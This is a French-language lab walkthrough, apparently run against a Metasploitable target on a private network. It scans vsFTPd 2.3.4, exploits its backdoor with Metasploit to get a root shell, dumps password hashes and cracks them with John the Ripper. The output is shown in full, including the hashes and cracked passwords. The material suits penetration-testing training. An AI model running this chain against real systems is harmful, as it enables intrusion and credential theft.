Scanning de la version VSFTP en utilisant MSF

msfconsole
msf6> use auxiliary/scanner/ftp/ftp_version
msf6> show options #to show options 
msf6> set RHOSTS 192.168.56.2 
msf6> run

[+] 192.168.56.2:21       - FTP Banner: '220 (vsFTPd 2.3.4)\\x0d\\x0a'
[*] 192.168.56.2:21       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Recherche d’une vulnérabilité de la version

> searchsploit vsftp

---------------------------------------------------- ---------------------------------
 Exploit Title                                      |  Path
---------------------------------------------------- ---------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory  | linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of  | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of  | windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                    | linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution           | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasplo | unix/remote/17491.rb
vsftpd 3.0.3 - Remote Denial of Service             | multiple/remote/49719.py
---------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploiter la vulve

On peut check si msf intégre directement un outils pour exploit la vuln via :

msf6> grep vsftp search exploits

1671  exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution

MSF exploit

On peut donc utiliser exploit/unix/ftp/vsftpd_234_backdoor pour exploiter la vulnérabilité.

msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> show options #to show options 
msf6> set RHOSTS 192.168.56.2 
msf6> run

[*] 192.168.56.2:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.56.2:21 - USER: 331 Please specify the password.
[+] 192.168.56.2:21 - Backdoor service has been spawned, handling...
[+] 192.168.56.2:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > [*] Command shell session 1 opened (192.168.56.3:33065 -> 192.168.56.2:6200) at 2023-01-04 07:38:53 -0500

MSF nous a ouvert un shell sur une session MSF. Pour accéder à cette session :

msf6> sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.56.3:33065 -> 192.168.56.2:6200 (192.168.56.2)

msf6> sessions -i 1

[*] Starting interaction with 1...

pwd
/

Extraction des utilisateurs et mot de passes

msf6> use post/linux/gather/hashdump
msf6> set SESSION 1
msf6> run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: unix

[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /home/kali/.msf4/loot/20230104075351_default_192.168.56.2_linux.hashes_013830.txt
[*] Post module execution completed

msf6> loot

Loot
====

host          service  type                  name                   content     info                            path
----          -------  ----                  ----                   -------     ----                            ----
192.168.56.2           linux.passwd          passwd.tx              text/plain  Linux Passwd File               /home/kali/.msf4/loot/20230104082357_default_192.168.56.2_linux.passwd_260206.txt
192.168.56.2           linux.shadow          shadow.tx              text/plain  Linux Password Shadow File      /home/kali/.msf4/loot/20230104082358_default_192.168.56.2_linux.shadow_248549.txt
192.168.56.2           linux.passwd.history  opasswd.tx             text/plain  Linux Passwd History File       /home/kali/.msf4/loot/20230104082400_default_192.168.56.2_linux.passwd.his_714613.txt
192.168.56.2           linux.hashes          unshadowed_passwd.pwd  text/plain  Linux Unshadowed Password File  /home/kali/.msf4/loot/20230104082401_default_192.168.56.2_linux.hashes_593258.txt

Brute force

┌──(kali㉿kali)-[~]
└─$ john /home/kali/.msf4/loot/20230104082401_default_192.168.56.2_linux.hashes_593258.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 7 password hashes with 7 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
user             (user)
postgres         (postgres)
msfadmin         (msfadmin)
service          (service)
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
123456789        (klog)
batman           (sys)